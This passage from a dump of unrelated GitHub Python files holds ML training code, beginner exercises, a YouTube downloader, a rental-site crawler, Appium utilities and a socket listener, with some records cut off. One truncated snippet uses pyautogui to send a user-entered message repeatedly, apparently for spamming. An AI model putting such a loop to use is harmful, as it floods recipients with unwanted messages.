autograd.grad(\r\n\t\t\toutputs=y_,\r\n\t\t\tinputs=x_,\r\n\t\t\tgrad_outputs=torch.ones_like(y_),\r\n\t\t\tcreate_graph=True,\r\n\t\t\tretain_graph=True,\r\n\t\t\tonly_inputs=True,\r\n\t\t\t)[0]\r\n\t\t# grad = grad.view(x_.shape[0], -1)\r\n\t\t# div = (grad.norm(2, dim=1) ** p).mean()\r\n\t\tdiv = (grad * grad).sum(dim=1, keepdim=True).sum(dim=2, keepdim=True).sum(dim=3, keepdim=True)\r\n\t\tdiv = torch.mean(div)\r\n\t\treturn div\r\n\r\n\tdef div_loss(self, x, y, r1_gamma=10.0, cuda=False):\r\n\t\tx_ = x.requires_grad_(True)\r\n\t\ty_ = self.dis(x_)\r\n\t\tgrad = autograd.grad(\r\n\t\t\toutputs=y_,\r\n\t\t\tinputs=x_,\r\n\t\t\tgrad_outputs=torch.ones_like(y_),\r\n\t\t\tcreate_graph=True,\r\n\t\t\tretain_graph=True,\r\n\t\t\tonly_inputs=True,\r\n\t\t\t)[0]\r\n\t\tgrad = grad * grad\r\n\t\tgrad = grad.sum(dim=1, keepdim=True).sum(dim=2, keepdim=True).sum(dim=3, keepdim=True)\r\n\t\tloss = grad.mean()\r\n\t\treturn loss\r\n\r\n\tdef discriminator_latent_loss(self, real_pred, fake_pred):\r\n\t\treal_loss = F.softplus(-real_pred).mean()\r\n\t\tfake_loss = F.softplus(fake_pred).mean()\r\n\t\treturn real_loss + 
fake_loss","repo_name":"zsl2018/StyleAnime","sub_path":"training/coach.py","file_name":"coach.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"79"} +{"seq_id":"35488870786","text":"\r\nMENU = {\r\n \"espresso\": {\r\n \"ingredients\": {\r\n \"water\": 50,\r\n \"coffee\": 18,\r\n },\r\n \"cost\": 1.5,\r\n },\r\n \"latte\": {\r\n \"ingredients\": {\r\n \"water\": 200,\r\n \"milk\": 150,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 2.5,\r\n },\r\n \"cappuccino\": {\r\n \"ingredients\": {\r\n \"water\": 250,\r\n \"milk\": 100,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 3.0,\r\n }\r\n}\r\nprofit = 0\r\nresources = {\r\n \"water\": 300,\r\n \"milk\": 200,\r\n \"coffee\": 100,\r\n}\r\n\r\ndef check_resources(order_ingredients):\r\n for item in order_ingredients:\r\n if order_ingredients[item] > resources[item]:\r\n print(f\"the {item} is not enough \")\r\n return False\r\n return True\r\n\r\n\r\n# check_resources(drink[\"ingredients\"])\r\ndef calc_coins():\r\n print(\"please insert coins\")\r\n total = int(input(\"how much quarters ? \")) * 0.25\r\n total += int(input(\"how much dimes ? \")) * 0.10\r\n total += int(input(\"how much nickels ? \")) * 0.05\r\n total += int(input(\"how much pennies ? \")) * 0.01\r\n return total\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef check_transaction(order_cost, payment):\r\n if order_cost > payment:\r\n print(\"sorry money is not enough. money refunded\")\r\n return False\r\n elif order_cost < payment:\r\n global profit\r\n profit += order_cost\r\n reminder = round(payment - order_cost, 2)\r\n print(f\"there is {reminder} a change, money refunded\")\r\n return True\r\n else:\r\n profit += order_cost\r\n return True\r\n\r\n\r\n#check_transaction(drink[\"cost\"], payment)\r\ndef make_coffee(drink_name,order_ingredients):\r\n for item in order_ingredients:\r\n resources[item]-= order_ingredients[item]\r\n print(f\"Here is your {drink_name} ☕ï¸�. Enjoy!\")\r\n return resources\r\n\r\n\r\n#make_coffe(choice,drink[\"ingredients\"])\r\ndef add_resources():\r\n resources[\"water\"]+=int(input(\"how much do you want to add to the water ? \"))\r\n resources[\"milk\"]+= int (input(\"how much do you want to add to the milk ? \"))\r\n resources[\"coffee\"]+= int (input(\"how much do you want to add to the coffee ? \"))\r\n #print(resources)\r\n return resources\r\n#add_resources()\r\ndef coffee_machine():\r\n\r\n \r\n # payment = calc_coins()\r\n still_going= True\r\n while still_going:\r\n #clear()\r\n print(\"Welcome 😊😊\")\r\n print(\"1.Shut down \\n2.Make order\\n3.Print report\\n4.Add supplies\")\r\n choicee = input(\"what would you like ? 
\").lower()\r\n if choicee==\"1\":\r\n still_going= False\r\n elif choicee==\"2\" :\r\n choice = input(\"what do you want to drink(espresso,latte,cappuccino) :\").lower()\r\n drink = MENU[choice]\r\n check_resources(drink[\"ingredients\"])\r\n check_transaction(drink[\"cost\"],calc_coins())\r\n make_coffee(choice,drink[\"ingredients\"])\r\n elif choicee ==\"3\":\r\n Water=resources[\"water\"]\r\n Milk=resources[\"milk\"]\r\n Coffee=resources[\"coffee\"]\r\n print(f\"{Water}\\n{Milk}\\n{Coffee}\\n{profit}\")\r\n elif choicee==\"4\":\r\n add_resources()\r\n print(f\"{Water}\\n{Milk}\\n{Coffee}\")\r\n else:\r\n print(\"input is not defined\")\r\n coffee_machine()\r\ncoffee_machine()\r\n\r\n","repo_name":"MariamElkhayat/Coffee_machine_code","sub_path":"coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36565309351","text":"import sys\n\ntry:\n import os\n from platform import system\n from pyfiglet import figlet_format\n from termcolor import colored\n from pafy import new\n from pytube import Playlist\nexcept Exception as error:\n print(colored(error, color=\"red\"))\n input(colored(\"[+]Press Any Key To Exit ..\", color=\"red\"))\n sys.exit()\n\n# To Clean The Terminal\nclear = lambda: os.system(\"cls\") if system() == \"Windows\" else os.system(\"clear\")\n\n\n# Start Class\nclass YoutubeDownloader:\n def __init__(self, url: str) -> None:\n self.url = url\n\n # Video Download Method\n def videoDownload(self) -> None:\n try:\n video = new(self.url)\n if len(video.streams) == 1:\n path_video = input(colored(\"[?]Video Path >>\", color=\"blue\"))\n video.streams[0].download(filepath=path_video)\n else:\n print(colored(\"[+]Video Quality....\", color=\"blue\"))\n print(\"\\n\")\n print(colored(\"[+]640x360p \\n[+]1280x720 \\n[+]Full Quality\", color=\"blue\"))\n print()\n quality_choose = int(input(colored(\"[?]Enter your choice >>\", color=\"blue\")))\n if quality_choose == 1:\n path_video = input(colored(\"[?]Video Path >>\", color=\"blue\"))\n video.streams[0].download(filepath=path_video)\n elif quality_choose == 2:\n path_video = input(colored(\"[?]Video Path >>\", color=\"blue\"))\n video.streams[1].download(filepath=path_video)\n elif quality_choose == 3:\n path_video = input(colored(\"[?]Video Path >>\", color=\"blue\"))\n dl = video.getbest()\n dl.download(filepath=path_video)\n else:\n print(colored(\"[-]You Have To Choice 1 or 2 or 3 \", color=\"red\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n # audio Download Method\n def audioDownload(self) -> None:\n try:\n audio = new(self.url)\n if len(audio.streams) == 1:\n path_audio = input(colored(\"[?]Audio Path >>\", color=\"blue\"))\n audio.streams[0].download(filepath=path_audio)\n else:\n print(colored(\"[+]Video Quality....\", color=\"blue\"))\n print(\"\\n\")\n print(colored(\"[+]640x360p \\n[+]1280x720 \\n[+]Full Quality\", color=\"blue\"))\n print()\n quality_choose = int(input(colored(\"[?]Enter your choice >>\", color=\"blue\")))\n if quality_choose == 1:\n path_audio = input(colored(\"[?]Audio Path >>\", color=\"blue\"))\n audio.audiostreams[0].download(filepath=path_audio)\n elif quality_choose == 2:\n path_audio = input(colored(\"[?]Audio Path >>\", color=\"blue\"))\n audio.audiostreams[1].download(filepath=path_audio)\n elif quality_choose == 3:\n path_audio = input(colored(\"[?]Audio Path >>\", color=\"blue\"))\n dl = 
audio.getbestaudio()\n dl.download(filepath=path_audio)\n else:\n print(colored(\"[-]You Have To Choice 1 or 2 or 3 \", color=\"red\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n # PlayList Download Method\n def videoPlayList(self) -> None:\n try:\n video_play_list = Playlist(self.url)\n print(colored(\"[+]Video Quality....\", color=\"blue\"))\n print(\"\\n\")\n print(colored(\"[+]Full Quality \\n[+]low Quality\", color=\"blue\"))\n print()\n quality_choose = int(input(colored(\"[?]Enter your choice >>\", color=\"blue\")))\n if quality_choose == 1:\n path = input(colored(\"[?]Path >>\", color=\"blue\"))\n for video in video_play_list.videos:\n video.streams.get_highest_resolution().download(output_path=path)\n\n elif quality_choose == 2:\n path = input(colored(\"[?]Path >>\", color=\"blue\"))\n for video in video_play_list.videos:\n video.streams.get_lowest_resolution().download(output_path=path)\n else:\n print(colored(\"[+]you have to choose 1 or 2 or 3....\", color=\"red\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n # Video Info Method\n def videoInfo(self) -> None:\n try:\n video = new(self.url)\n print(colored(f\"[+]The Video Title Is :{video.title}\", color=\"blue\"))\n print(colored(f\"[+]The Channel Name Is: {video.author}\", color=\"blue\"))\n print(colored(f\"[+]The Video Views Is: {video.viewcount}\", color=\"blue\"))\n print(colored(f\"[+]The Video Likes Is: {video.likes}\", color=\"blue\"))\n print(colored(f\"[+]The Video Dislikes Is:{video.dislikes}\", color=\"blue\"))\n print(colored(f\"[+]The Video Time Is: {video.duration}\", color=\"blue\"))\n print(colored(f\"[+]The Video Image Is: {video.thumb}\", color=\"blue\"))\n print(colored(f\"[+]The Video ID Is: {video.videoid}\", color=\"blue\"))\n print(colored(f\"[+]The Video UserName Is: {video.username}\", color=\"blue\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n\n# The Main Function\ndef main():\n try:\n clear()\n print(colored(figlet_format(\"Youtube Downloader \"), color=\"blue\"))\n print(\"\\n\")\n print(colored(\"\"\"\n[+]Video download\n[+]Audio download\n[+]Video PlayList download\n[+]Info video\n \"\"\", color=\"blue\"))\n print(\"\\n\")\n choice = int(input(colored(\"[?]Enter your choice >>\", color=\"blue\")))\n URl = input(colored(\"[?]Video URL >>\", color=\"blue\"))\n Youtube = YoutubeDownloader(url=URl)\n if choice == 1:\n Youtube.videoDownload()\n print(\"\\n\")\n print(colored(\"[+]DONE \", color=\"blue\"))\n elif choice == 2:\n Youtube.audioDownload()\n print(\"\\n\")\n print(colored(\"[+]DONE \", color=\"blue\"))\n elif choice == 3:\n Youtube.videoPlayList()\n print(\"\\n\")\n print(colored(\"[+]DONE \", color=\"blue\"))\n elif choice == 4:\n Youtube.videoInfo()\n else:\n print(colored(\"[-]You Have To Choice 1 or 2 or 3 \", color=\"red\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"abdulaziz5alsharji/random-python-projects","sub_path":"YoutubeDownloaderV3.py","file_name":"YoutubeDownloaderV3.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"452602726","text":"\"\"\" l_relu.py\n practice for relu\n\"\"\"\n\nimport tensorflow as tf\n\n\ndef l_relu():\n \"\"\" l_rely\"\"\"\n layer_1 = tf.keras.layers.ReLU()\n print(layer_1([-3.0, -1.0, 0.0, 1.0, 
5.0]).numpy())\n\n # define max_value\n layer_2 = tf.keras.layers.ReLU(max_value=4.0)\n print(layer_2([-3.0, -1.0, 0.0, 1.0, 5.0]).numpy())\n\n # define threshold\n layer_3 = tf.keras.layers.ReLU(threshold=1.5)\n print(layer_3([-3.0, -1.0, 0.0, 1.0, 5.0]).numpy())\n\n # define negative_slope\n layer_4 = tf.keras.layers.ReLU(negative_slope=1.0)\n print(layer_4([-3.0, -1.0, 0.0, 1.0, 5.0]).numpy())\n\n layer_5 = tf.keras.layers.LeakyReLU(alpha=1.0)\n print(layer_5([-3.0, -1.0, 0.0, 1.0, 5.0]).numpy()) # layer_4 has same results with layer_5\n\n\nl_relu()\n","repo_name":"BestNico/MLHandsBook","sub_path":"chapter_11/activation_layer/l_relu.py","file_name":"l_relu.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29819480678","text":"import pygame\nimport math\nfrom pygamegraph.constants import Constants\nfrom pygamegraph.text import Text\n\n\nclass BaseGraph(pygame.sprite.Sprite):\n \"\"\"\n Base graph class\n \"\"\"\n def __init__(\n self,\n size: tuple,\n x: list,\n y: list,\n text_size: int = 20\n ):\n \"\"\"\n :param size:\n :param x: first list\n :param y: second list\n \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.x_list = x\n self.y_list = y\n self.size = size # size of graph\n self.xscale = len(self.x_list) or 1\n self.yscale = 10\n self.grid = False\n self.color = Constants.BLACK.value\n self.line_color = Constants.BLACK.value # line color\n self.line_width = 1\n self.xpart_size = self.size[0] / self.xscale\n self.image = pygame.Surface(size, 5)\n self.image.fill(Constants.BLACK.value)\n self.rect = self.image.get_rect()\n # self.y_top_text = Text(text_size) # print max(self.y_list) on the left-top edge\n # self.x_bottom_text = Text(text_size) # print last element self.x_list on the right-bottom edge\n self.title = Text(text_size)\n self.xlabel = Text(text_size) # name of x axis\n self.ylabel = Text(text_size) # name of y axis\n self.ylabel.angle = 90\n\n @staticmethod\n def _compress(lst):\n step = 2\n finaly_len = len(lst) // step\n i = 0\n while len(lst) > finaly_len:\n step = step if step <= len(lst[i:]) else len(lst[i:])\n if max(lst) in lst[i:step + i]:\n lst[i] = max(lst)\n elif min(lst) in lst[i:step + i]:\n lst[i] = min(lst)\n else:\n lst[i] = math.ceil(sum(lst[i:step + i]) / len(lst[i:step + i]))\n for _ in range(step - 1):\n lst.pop(i + 1)\n i += 1\n return lst\n\n def update(self):\n self.ylabel.update(xy=(\n (self.rect.left - self.ylabel.size // 2) - self.ylabel.size - len(str(max(self.y_list))),\n (self.size[1] - self.rect.top) // 2),\n color=Constants.BLACK.value\n )\n self.xlabel.update(xy=(self.rect.centerx, self.rect.bottom + self.xlabel.size),\n color=Constants.BLACK.value)\n self.title.update(xy=(self.rect.centerx, self.rect.top - self.title.size),\n color=Constants.BLACK.value)\n self.xscale = len(self.x_list)\n\n def draw_grid(self):\n for xpart in range(self.xscale):\n pygame.draw.line(\n pygame.display.get_surface(),\n self.color,\n (self.rect.left + (xpart * self.xpart_size), self.rect.bottom),\n (self.rect.left + (xpart * self.xpart_size), self.rect.top),\n 1\n )\n for ypart in range(1, self.yscale):\n pygame.draw.line(\n pygame.display.get_surface(),\n self.color,\n (\n self.rect.left, self.rect.bottom - ((self.size[1] // 10) * ypart)\n ),\n (\n self.rect.right, self.rect.bottom - ((self.size[1] // 10) * ypart)\n ),\n 1\n )\n\n def draw_values(self):\n max_y_list = max(self.y_list)\n for xpart in range(self.xscale):\n number = Text(15)\n 
number.update(\n text=f'{self.x_list[xpart]}',\n xy=(self.rect.left + (xpart * self.xpart_size), self.rect.bottom + number.size // 2),\n color=Constants.BLACK.value\n )\n number.draw()\n y_num_len = len(str(max(self.y_list)))\n for ypart in range(1, self.yscale):\n number = Text(15)\n number.update(\n text=f'{(max_y_list / 10) * ypart:.{y_num_len + 1}}',\n xy=(\n self.rect.left - number.size - len(str(max_y_list)) // 2,\n self.rect.bottom - ((self.size[1] // 10) * ypart) - (number.size / 3)\n ),\n color=Constants.BLACK.value\n )\n number.draw()\n\n def draw(self):\n self.xscale = len(self.x_list) or 1\n self.xpart_size = self.size[0] / self.xscale\n pygame.draw.rect(pygame.display.get_surface(), self.color, self, self.line_width)\n max_y_list = max(self.y_list)\n percent = self.size[1] / max_y_list\n self.title.draw()\n self.ylabel.draw()\n self.xlabel.draw()\n if self.grid:\n self.draw_grid()\n self.draw_values()\n for part in range(self.xscale-1):\n pygame.draw.line(\n pygame.display.get_surface(),\n self.line_color,\n (\n self.rect.left + part * self.xpart_size,\n self.rect.bottom - self.y_list[part] * percent\n ),\n (\n self.rect.left + (part + 1) * self.xpart_size,\n self.rect.bottom - self.y_list[part+1] * percent\n ),\n 2\n )\n","repo_name":"vallenov/pygamegraph","sub_path":"pygamegraph/base_graph.py","file_name":"base_graph.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41340925604","text":"# import pywhatkit as pyw\n# pyw.sendwhatmsg('+923460864256' , 'wellcome to ansab' , 11,15)\nimport pyautogui as pt\nimport time\n\nlimit = input(\"Enter Limit : - \")\nmesssage = input(\"Enter Message : -\")\n\ni=0\n\ntime.sleep(2)\nwhile i = cond_num):\r\n B = tildeB*np.sqrt(DeT)\r\n break\r\n u = generate_u_triangle(num)\r\n n = np.random.multivariate_normal([0, 0], B, num).T\r\n data.append(u+n)\r\n\r\npUMatr, pdfs_of_subjects, positions, xmin, xmax, ymin, ymax, dimx, dimy = est_common_density2D(data, bw_method=h, outliers=0,\r\n dimx=100, xmin=-50, xmax=50,\r\n dimy=100, ymin=-50, ymax=50)\r\nfor j in range(0, vnum):\r\n counter_plt = j - 16*int(j/16)\r\n # --------------------------------------------------#\r\n row = counter_plt % 4\r\n col = int(counter_plt/4)\r\n if row == col == 0: f1, axarr1 = plt.subplots(4, 4, figsize=(12, 10))\r\n axarr1[row, col].imshow(pdfs_of_subjects[j], origin='lower', interpolation='nearest',\r\n cmap=plt.cm.gist_earth_r,\r\n extent=[xmin, xmax, ymin, ymax],\r\n vmin=None, vmax=None)\r\n axarr1[row, col].plot(data[j][0], data[j][1], 'k.', markersize=0.03)\r\n #axarr1[row, col].set_title(str(j+1))\r\n axarr1[row, col].set_xlim(xmin, xmax)\r\n axarr1[row, col].set_ylim(ymin, ymax)\r\n axarr1[row, col].set_xticks([xmin*2/3, 0, xmax*2/3])\r\n axarr1[row, col].set_yticks([ymin*2/3, 0, ymax*2/3])\r\n axarr1[row, col].tick_params(axis='both', which='major', labelsize=10)\r\n axarr1[row, col].set_axis_off()\r\n\r\nx1, x2 = np.meshgrid(np.linspace(xmin, xmax, num=dimx, endpoint=True, retstep=False, dtype=None), np.linspace(ymin, ymax, num=dimy, endpoint=True))\r\npos = np.vstack([x1.ravel(), x2.ravel()])\r\nvalues = np.hstack(data)\r\nkernel = scipy.stats.gaussian_kde(values, bw_method=h)\r\npdfAll = np.reshape(kernel.evaluate(pos).T, x1.shape)\r\n\r\nu = generate_u_triangle(num)\r\nkernel2 = scipy.stats.gaussian_kde(u, bw_method=h)\r\npdfGround_truth = np.reshape(kernel2.evaluate(pos).T, x1.shape)\r\n\r\nfig, axs = plt.subplots(1, 3, figsize=(9, 3), 
sharey=True)\r\naxs[2].imshow(pdfGround_truth, origin='lower', interpolation='nearest', cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax], vmin=None, vmax=None)\r\naxs[2].set_axis_off()\r\naxs[0].imshow(pdfAll, origin='lower', interpolation='nearest', cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax], vmin=None, vmax=None)\r\naxs[0].set_axis_off()\r\naxs[1].imshow(pUMatr, origin='lower', interpolation='nearest', cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax], vmin=None, vmax=None)\r\naxs[1].set_axis_off()\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"andreyzhitnikov/common_statistics","sub_path":"common_density_demo.py","file_name":"common_density_demo.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8224876215","text":"import json\nfrom appium.webdriver.common.touch_action import TouchAction as TA\nfrom common.exceptionList import ScriptFailure\n\nclass DeviceUtils:\n\n    def isPlatform(self, platform):\n        return self.settings.platform_name == str(platform).lower()\n\n    def onScreenSwipe(self, start, dirOrEnd):\n        '''\n        This is a method to swipe on the screen in the direction passed as the parameter starting from the start parameter\n        :param start: This is the co-ordinates or element for the initial tap\n        :param dir: This is the direction in which the tapped location is to be dragged. Accepted dir: \"left\", \"right\", \"up\", \"down\" or it should be a Dict as {\"x\": value, \"y\": value}\n        :return: \n        :Use: This will be mainly used to swipe delete elements or close tabs.\n        '''\n        if type(dirOrEnd) is str:\n            end = {\n                'x': None,\n                'y': None\n            }\n            #max = self.driver.get_window_size()\n            if dirOrEnd.lower() == \"left\":\n                end['x'] = -100 #if start['x']>100 else 1\n                end['y'] = 0\n            elif dirOrEnd.lower() == \"right\":\n                end['x'] = 100 #if start['x']100 else 1\n            elif dirOrEnd.lower() == \"down\":\n                end['x'] = 0\n                end['y'] = 100 #if start['y'](\\d+)米', res_murl.text)\n                item['distance'] = flag and flag[0] or None\n\n            except TimeoutError:\n                item['longitude'] = None\n                item['latitude'] = None\n                item['distance'] = None\n                print(\"获取经纬度与距离信息失败,m_url:{}\".format(item['m_url']))\n\n            self.collections.update_one({\"m_url\": item[\"m_url\"]}, {\"$set\": item}, upsert=True)\n            self.count += 1\n            print(\"第{}条保存成功:{}\".format(self.count, item))\n\n    @staticmethod\n    def _parse_house_tags(house_tags):\n        if house_tags:\n            tags = \"\"\n            for tag in house_tags:\n                tags += tag.get(\"name\")\n            return tags.strip()\n\n    def _write_bc_list_to_text(self, bc_lists):\n        with open(self.txt_path, 'w') as f:\n            for bc_list in bc_lists:\n                f.write(bc_list + \"\\n\")\n\n    def _read_bc_list_from_text(self):\n        with open(self.txt_path, \"r\") as f:\n            return [line.strip() for line in f.readlines()]\n\n\nif __name__ == \"__main__\":\n    p = ThreadPool(4)\n\n    rent = Rent()\n    rent.get_data_second([p])\n","repo_name":"ErisYoung/Crawler-Analysis","sub_path":"lianjia_BSGS/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":8772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71038234175","text":"tasks = []\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# We want to keep the tasks we have to do in a day\n# as a list, and display them\nclass Task:\n    title = None\n    description = None\n    is_done = False\n\n    def __init__(self, title, description) -> None:\n        self.title = title\n        
self.description = description\n\n    def done(self):\n        self.is_done = True\n\n    def __str__(self) -> str:\n        done = \"x\" if self.is_done else \"-\"\n        return f\"[{done}] {self.title.ljust(10)} '{self.description}'\"\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Build a list of tasks\ntasks.append(Task(\"Buy\", \"Buy soda for dinner\"))\ntasks.append(Task(\"Gym\", \"Go to gym\"))\ntasks.append(Task(\"Mail\", \"Send mail to Office\"))\ntasks.append(Task(\"Wash your Car\", \"\"))\ntasks.append(Task(\"Buy\", \"Buy a pen\"))\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Exercise 1\n# Can you add two more tasks to this list?\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Exercise 2\n# Can you add another attribute to the Task class? What are the priority\n# and importance of each task? Low, medium, high\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Mark two of the tasks we created as done\ntasks[1].done()\ntasks[2].done()\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Display the tasks we created\nfor task in tasks:\n    print(task)\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Exercise 3\n# Can you display the task list using a\n# while\n# loop?\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Exercise 4\n# Can you save the task list to a file?","repo_name":"sh-navid/Archive.Learn.Python","sub_path":"lessons/python/exercises/exercise-general-week-05-09.py","file_name":"exercise-general-week-05-09.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"pnb","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"6260759173","text":"import numpy as np\nimport torch\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader, random_split\n\nfrom preprocess_data import pad_sequence\nfrom utils.linq_translation_data import TranslationFileIterator\n\n\ndef convert_seq_to_target(src_values, tgt_values, max_input_seq_length, eos_value: int=2):\n    src_length = len(src_values)\n    if src_length < max_input_seq_length:\n        src_values = pad_sequence(src_values, eos_value, max_input_seq_length)\n        src_length = max_input_seq_length\n    tgt_values = pad_sequence(tgt_values, eos_value, max_input_seq_length)\n    data_x = []\n    data_y = []\n    for i in range(0, src_length - max_input_seq_length):\n        seq_in = src_values[i:i + max_input_seq_length]\n        output_char = tgt_values[i]\n        data_x.append(seq_in)\n        data_y.append(output_char)\n    return data_x, data_y\n\n\ndef convert_translation_file_to_csv(txt_file_path: str=\"../data/linq-sample.txt\",\n                                    output_file_path: str=\"./output/linq-sample.csv\",\n                                    max_input_seq_length: int=100,\n                                    eos_value: int=2):\n    file_iter = TranslationFileIterator(txt_file_path)\n    with open(output_file_path, \"w\", encoding='utf-8') as csv:\n        csv.write('features\\tlabel\\n')\n        for src_values, tgt_values in file_iter:\n            ds_features, ds_label = convert_seq_to_target(src_values, tgt_values, max_input_seq_length, eos_value=eos_value)\n            for features, label in zip(ds_features, ds_label):\n                csv.write(','.join(str(x) for x in features))\n                csv.write('\\t')\n                csv.write(str(label))\n                csv.write('\\n')\n\ndef comma_str_to_array(df):\n    return df.map(lambda l: np.array([int(n) for n in l.split(',')], dtype=np.float16))\n\nclass Linq2TSqlDataset(Dataset):\n    def __init__(self, csv_file_path):\n        self.df = df = pd.read_csv(csv_file_path, sep='\\t')\n        self.df_features = 
comma_str_to_array(df['features'])\n self.df_label = df['label']\n self.features = torch.tensor(self.df_features).long()\n self.label = torch.tensor(self.df_label).long()\n\n def __len__(self):\n return len(self.features)\n\n # This returns given an index the i-th sample and label\n def __getitem__(self, idx):\n return self.features[idx], self.label[idx]\n\n def create_dataloader(self, batch_size=32):\n train_size = int(0.8 * len(self))\n val_size = len(self) - train_size\n train_data, val_data = random_split(self, [train_size, val_size])\n train_loader = DataLoader(train_data, batch_size=batch_size)\n val_loader = DataLoader(val_data, batch_size=batch_size)\n return train_loader, val_loader\n\nif __name__ == '__main__':\n convert_translation_file_to_csv()\n # ds = Linq2TSqlDataset('./output/linq-sample.csv')\n # train_loader, val_loader = ds.create_dataloader()\n # for item in val_loader:\n # print(f\"{item=}\")\n\n","repo_name":"flashlin/Samples","sub_path":"Tempermonkey-vue3-tfjs/torch/labs/prepare5.py","file_name":"prepare5.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"995326275","text":"# URLify: Write a method to replace all spaces in a string with '%20'. You may assume that the string has sufficient space at the end to hold the additional characters, and that you are given the \"true\" length of the string. \n# O(N)\n\nimport unittest\n\ndef urlify(string, length):\n\tchar_array = [None] * length\n\tactive_space = True # Make sure we start with a character, not a space\n\ti = 0\n\tfor char in string:\n\t\tif i == length:\n\t\t\tbreak\n\t\tif char != ' ':\n\t\t\tchar_array[i] = char\n\t\t\ti += 1\n\t\t\tactive_space = False\n\t\telif active_space is False:\n\t\t\tchar_array[i] = '%20'\n\t\t\ti += 1\n\t\t\tactive_space = True\n\treturn ''.join(char_array)\n\nclass Test(unittest.TestCase):\n\t'''Test Cases'''\n\tdata = [\n\t\t('Mr John Smith ', 13,'Mr%20John%20Smith'),\n\t\t('Moe is tired', 12, 'Moe%20is%20tired'),\n\t\t(\" Leading spaces don't count\", 26, \"Leading%20spaces%20don't%20count\"),\n\t]\n\t\n\tdef test_urlify(self):\n\t\tfor [test_string, length, expected] in self.data:\n\t\t\tactual = urlify(test_string, length)\n\t\t\tself.assertEqual(actual, expected)\n\nif __name__ == \"__main__\":\n\tunittest.main()\n","repo_name":"chasebleyl/ctci","sub_path":"data-structures/interview-questions/arrays_and_strings/1_3.py","file_name":"1_3.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2137497679","text":"#twig is the main computer\nimport socket\nimport netifaces\nfrom netifaces import AF_INET\nimport threading\nimport struct\nimport time\n\nclass twig:\n def __init__(self, ip, port, methods):\n \n self.methods = methods\n self.host = ip #\"0.0.0.0\"#192.168.1.102\n self.port = port\n #print(netifaces.ifaddresses('wlp2s0')[AF_INET][0]['addr'])\n self.socketOpener()\n \n def socketOpener(self):\n self.mySocket = socket.socket()\n self.mySocket.bind((self.host,self.port))\n\n def getConnection(self):\n self.mySocket.listen(1)\n self.conn, self.addr = self.mySocket.accept()\n print (\"Connection from: \" + str(self.addr))\n\n return True\n\n def listener(self): \n print('HERE WE ARE')\n self.methods[\"console\"]('L010 | Attempting to Open Listener')\n #self.mySocket.setblocking(0)\n data = b''\n result = self.conn.recv(65536)\n start = time.time()\n data += result\n 
